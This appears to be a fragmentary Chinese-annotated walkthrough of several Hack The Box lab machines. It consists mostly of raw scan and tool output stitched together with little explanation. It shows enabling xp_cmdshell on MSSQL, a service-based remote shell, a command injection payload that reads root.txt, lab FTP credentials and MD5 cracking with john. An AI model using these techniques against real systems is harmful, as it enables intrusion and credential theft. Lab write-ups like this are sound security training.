Nmap scan report for 10.10.10.27 Host is up (0.51s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000 Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
smbmap -H 10.10.10.27 -u test [+] Guest session IP: 10.10.10.27:445 Name: 10.10.10.27 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin backups READ ONLY C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC
空密码即可登入
1 2 3 4 5 6 7 8 9 10 11
smbclient \\\\10.10.10.27\\backups -U test Enter WORKGROUP\test's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Fri Jun 4 12:10:59 2021 .. D 0 Fri Jun 4 12:10:59 2021 prod.dtsConfig AR 609 Mon Jan 20 20:23:02 2020 schtasks.txt A 174006 Fri Jun 4 12:05:57 2021 services.txt A 6370 Fri Jun 4 12:10:59 2021 10328063 blocks of size 4096. 8165400 blocks available
1 2
smb: \> get prod.dtsConfig getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
Password: [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'. [*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (140 3232) [!] Press helpfor extra shell commands SQL> enable_xp_cmdshell [*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. [*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. SQL> xp_cmdshell whoami output
Password: [*] Requesting shares on 10.10.10.27..... [*] Found writable share ADMIN$ [*] Uploading file OFvCNrQJ.exe [*] Opening SVCManager on 10.10.10.27..... [*] Creating service SMtb on 10.10.10.27..... [*] Starting service SMtb..... [!] Press helpfor extra shell commands Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved.
Nmap scan report for 10.10.10.28 Host is up (0.68s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
------------------ : EV Bug Tracker : ------------------
Provide Bug ID: ;cat$IFS$9/root/root.txt ---------------
cat: /root/reports/: Is a directory af13b0bee69f8a877c3faf667f7beacf
Archetype
Linux
端口扫描
1 2 3 4 5 6 7 8 9 10
nmap -sV -sT -Pn 10.10.10.46
Nmap scan report for 10.10.10.46 Host is up (0.59s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
漏洞利用
The credentials ftpuser / mc@F1l3ZilL4 can be used to login to the FTP server. – 官方WP
ftp 10.10.10.46 Connected to 10.10.10.46. 220 (vsFTPd 3.0.3) Name (10.10.10.46:root): ftpuser 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 2533 Feb 03 2020 backup.zip 226 Directory send OK. ftp> get backup.zip local: backup.zip remote: backup.zip 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for backup.zip (2533 bytes). 226 Transfer complete. 2533 bytes received in 0.23 secs (10.7549 kB/s)
echo -n "2cb42f8734ea607eefed3b70af13bbd3" > passwd john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt passwd Using default input encoding: UTF-8 Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3]) Warning: no OpenMP support for this hashtype, consider --fork=2 Press 'q' or Ctrl-C to abort, almost any other key for status qwerty789 (?) 1g 0:00:00:00 DONE (2021-06-05 19:16) 33.33g/s 3340Kp/s 3340Kc/s 3340KC/s shunda..pogimo Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably Session complete
Matching Defaults entries for postgres on vaccine: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User postgres may run the following commands on vaccine: (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
Nmap scan report for 10.10.10.29 Host is up (0.38s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 3306/tcp open mysql MySQL (unauthorized) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host Name: SHIELD OS Name: Microsoft Windows Server 2016 Standard OS Version: 10.0.14393 N/A Build 14393 OS Manufacturer: Microsoft Corporation OS Configuration: Member Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00376-30000-00299-AA303 Original Install Date: 2/4/2020, 12:58:01 PM System Boot Time: 6/5/2021, 8:21:33 PM System Manufacturer: VMware, Inc. System Model: VMware7,1 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume2 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-08:00) Pacific Time (US & Canada) Total Physical Memory: 2,047 MB Available Physical Memory: 753 MB Virtual Memory: Max Size: 2,431 MB Virtual Memory: Available: 1,015 MB Virtual Memory: In Use: 1,416 MB Page File Location(s): C:\pagefile.sys Domain: MEGACORP.LOCAL Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: vmxnet3 Ethernet Adapter Connection Name: Ethernet0 2 DHCP Enabled: No IP address(es) [01]: 10.10.10.29 [02]: fe80::98f9:2cd0:ff27:3fbc [03]: dead:beef::98f9:2cd0:ff27:3fbc Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Privilege Name Description State ======================= ========================================= ======= SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled
Nmap scan report for 10.10.10.30 Host is up (0.57s latency). Not shown: 9987 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-06-08 13:22:07Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows